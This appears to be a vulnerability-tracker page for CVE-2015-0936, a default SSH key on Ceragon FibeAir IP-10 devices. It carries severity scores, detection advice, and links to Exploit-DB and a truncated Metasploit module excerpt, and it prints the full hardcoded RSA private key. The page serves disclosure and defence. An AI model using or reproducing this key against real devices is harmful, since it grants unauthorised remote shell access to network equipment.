CVE-2015-0936
published 2017-06-01CVE-2015-0936: Ceragon FibeAir IP-10 have a default SSH public key in the authorized_keys file for the mateidu user, which allows remote attackers to obtain SSH access by…
PriorityP180critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
78.09%
99.5th percentile
Ceragon FibeAir IP-10 have a default SSH public key in the authorized_keys file for the mateidu user, which allows remote attackers to obtain SSH access by leveraging knowledge of the private key.
Detection & IOCsextracted from sources · hover to see the quote
other-----BEGIN RSA PRIVATE KEY-----
MIICWwIBAAKBgQDBEh0OUdoiplc0P+XW8VPu57etz8O9eHbLHkQW27EZBEdXEYxr
MOFXi+PkA0ZcNDBRgjSJmHpo5WsPLwj/L3/L5gMYK+yeqsNu48ONbbqzZsFdaBQ+
IL3dPdMDovYo7GFVyXuaWMQ4hgAJEc+kk1hUaGKcLENQf0vEyt01eA/k6QIBIwKB
gQCwhZbohVm5R6AvxWRsv2KuiraQSO16B70ResHpA2AW31crCLrlqQiKjoc23mw3
CyTcztDy1I0stH8j0zts+DpSbYZnWKSb5hxhl/w96yNYPUJaTatgcPB46xOBDsgv
4Lf4GGt3gsQFvuTUArIf6MCJiUn4AQA9Q96QyCH/g4mdiwJBAPHdYgTDiQcpUAbY
SanIpq7XFeKXBPgRbAN57fTwzWVDyFHwvVUrpqc+SSwfzhsaNpE3IpLD9RqOyEr6
B8YrC2UCQQDMWrUeNQsf6xQer2AKw2Q06bTAicetJWz5O8CF2mcpVFYc1VJMkiuV
93gCvQORq4dpApJYZxhigY4k/f46BlU1AkAbpEW3Zs3U7sdRPUo/SiGtlOyO7LAc
WcMzmOf+vG8+xesCDOJwIj7uisaIsy1/cLXHdAPzhBwDCQDyoDtnGty7AkEAnaUP
YHIP5Ww0F6vcYBMSybuaEN9Q5KfXuPOUhIPpLoLjWBJGzVrRKou0WeJElPIJX6Ll
7GzJqxN8SGwqhIiK3wJAOQ2Hm068EicG5WQoS+8+KIE/SVHWmFDvet+f1vgDchvT
uPa5zx2eZ2rxP1pXHAdBSgh799hCF60eZZtlWnNqLg==
-----END RSA PRIVATE KEY-----↗
- →Detect SSH authentication attempts to Ceragon FibeAir IP-10 devices using the 'mateidu' username — any successful login with this account using publickey auth should be treated as exploitation of CVE-2015-0936. ↗
- →The exploit authenticates exclusively via SSH public key (no password). Alert on publickey-method SSH logins for the 'mateidu' user on port 22. ↗
- →Post-authentication, the exploit immediately spawns /bin/sh over the SSH channel. Monitor for interactive shell sessions spawned directly from SSH daemon processes under the mateidu account. ↗
- →The hardcoded RSA private key (MIICWwIBAAKBgQDBEh0OUdoiplc0P+...) is embedded in the Metasploit module and public exploits. Fingerprint the public key counterpart in authorized_keys files on SSH servers to identify vulnerable or compromised Ceragon devices. ↗
- ·The default SSH_TIMEOUT for the Metasploit exploit module is 30 seconds; network-level detection rules should account for slow or delayed SSH negotiation that may still represent exploitation attempts. ↗
- ·The exploit supports proxy chaining (datastore['Proxies']), meaning the true attacker source IP may be obscured. IP-based blocking alone is insufficient. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)
exploitdb·2015-04-01
CVE-2015-0936 Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)
Ceragon FibeAir IP-10 - SSH Private Key Exposure (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'net/ssh'
class MetasploitModule 'Ceragon FibeAir IP-10 SSH Private Key Exposure',
'Description' => %q{
Ceragon ships a public/private key pair on FibeAir IP-10 devices
that allows passwordless authentication to any other IP-10 device.
Since the key is easily retrievable, an attacker can use it to
gain unauthorized remote access as the "mateidu" user.
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => false,
'Targets' => [ [ "Universal", {} ] ],
'Payload' =>
{
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find',
},
},
'Author' =
Metasploit
Ceragon FibeAir IP-10 SSH Private Key Exposure
metasploit
Ceragon FibeAir IP-10 SSH Private Key Exposure
Ceragon FibeAir IP-10 SSH Private Key Exposure
Ceragon ships a public/private key pair on FibeAir IP-10 devices that allows passwordless authentication to any other IP-10 device. Since the key is easily retrievable, an attacker can use it to gain unauthorized remote access as the "mateidu" user.
No writeups or analysis indexed.
http://packetstormsecurity.com/files/131259/Ceragon-FibeAir-IP-10-SSH-Private-Key-Exposure.htmlhttp://packetstormsecurity.com/files/131260/Ceragon-FibeAir-IP-10-SSH-Private-Key-Exposure.htmlhttp://seclists.org/fulldisclosure/2015/Apr/3http://www.securityfocus.com/bid/73696https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&cad=rja&uact=8&ved=0ahUKEwjs47SGp47UAhVF5iYKHYGLDQkQFggoMAE&url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Flinux%2Fssh%2Fceragon_fibeair_known_privkey&usg=AFQjCNFZiZcWj47cpqPX-AbfpsW0DL4yYwhttp://packetstormsecurity.com/files/131259/Ceragon-FibeAir-IP-10-SSH-Private-Key-Exposure.htmlhttp://packetstormsecurity.com/files/131260/Ceragon-FibeAir-IP-10-SSH-Private-Key-Exposure.htmlhttp://seclists.org/fulldisclosure/2015/Apr/3http://www.securityfocus.com/bid/73696https://gist.github.com/todb-r7/5d86ecc8118f9eeecc15https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&cad=rja&uact=8&ved=0ahUKEwjs47SGp47UAhVF5iYKHYGLDQkQFggoMAE&url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fexploit%2Flinux%2Fssh%2Fceragon_fibeair_known_privkey&usg=AFQjCNFZiZcWj47cpqPX-AbfpsW0DL4yYw
2017-06-01
Published